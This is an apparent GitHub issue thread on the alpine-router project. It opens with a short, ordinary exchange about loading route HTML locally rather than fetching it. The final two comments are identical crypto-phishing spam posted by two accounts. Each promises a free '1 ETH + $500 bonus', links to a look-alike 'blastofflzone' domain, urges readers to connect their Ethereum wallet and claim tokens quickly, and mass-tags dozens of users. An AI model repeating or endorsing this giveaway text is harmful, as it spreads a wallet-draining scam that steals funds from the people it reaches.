### ISSUE TITLE
The route loads HTML files remotely. Is there any way to load HTML locally and package it?

### ISSUE THREAD

**Issue by mmm8955405** [melnikaite/alpine-router#1]
The route loads HTML files remotely. Is there any way to load HTML locally and package it?

**Comment by melnikaite** [comment]
If you used regular `import` syntax instead of `fetch` then your module builder would include html to a build
Feel free to fork and implement this

**Comment by mmm8955405** [comment]
OK

**Comment by aerosonic-jp** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
xihadandan, @xiaoluoboding, @gonzalomelov, @QETHAN, @chenjianxin, @manelio, @adibfirman, @shamabe, @linsheng9731, @moredure, @OwlFlyFine, @yangjinlongpk, @hustchenbo, @jxmorris12, @francomd, @Eib31, @tejasmanohar, @deenjohn, @durango, @akramaglan20, @jacobburrell, @henridev, @ken109, @ottpeter, @tjmac21, @ShanRubyist, @Henok7777, @saiikunst, @hzitoun, @bluecell296, @t4nz, @jerry117, @bliu2000, @Butters3388214, @JasonTy, @ehitco, @luzzif, @skyme5, @qiang1234zhang, @SUNGMYEONGGI, @rupertqin, @guopeizhun, @MichalZalecki, @elkhan, @tincho, @WangZiHao752, @chudinhbka, @vreality64, @mohamedsadiq, @baixiaosh

**Comment by byungster** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
CuiChuping, @pushpak1300, @DarrynPatterson, @MileanCo, @michiboo, @y-naught, @mgarciat1090, @nicholashc, @coinrule-token, @hochem, @mate-h, @pierrus, @NukeManDan, @madren, @YoussefEgla, @wedik66, @pavlos-p, @georgiIvanov, @dmitryn, @theflutterfactory, @pdrosos, @rupshabagchi, @ManuelAF, @art049, @yangzhen0512, @wmorin, @ruslanys, @eobare, @dessHub, @zhao-core, @cjohansen11, @olegnn, @vizzdoom, @tuga1975, @ZaneH, @xuguangyuansh, @Guidosalimbeni, @seungwon2, @ilyukou, @tajpouria, @roshanrehana, @thanasik, @yifan-gu, @brunob15, @wendylee0901, @bitmyth, @jguzmancampoy, @gitalfredo, @MartinBucko, @Julybui199x
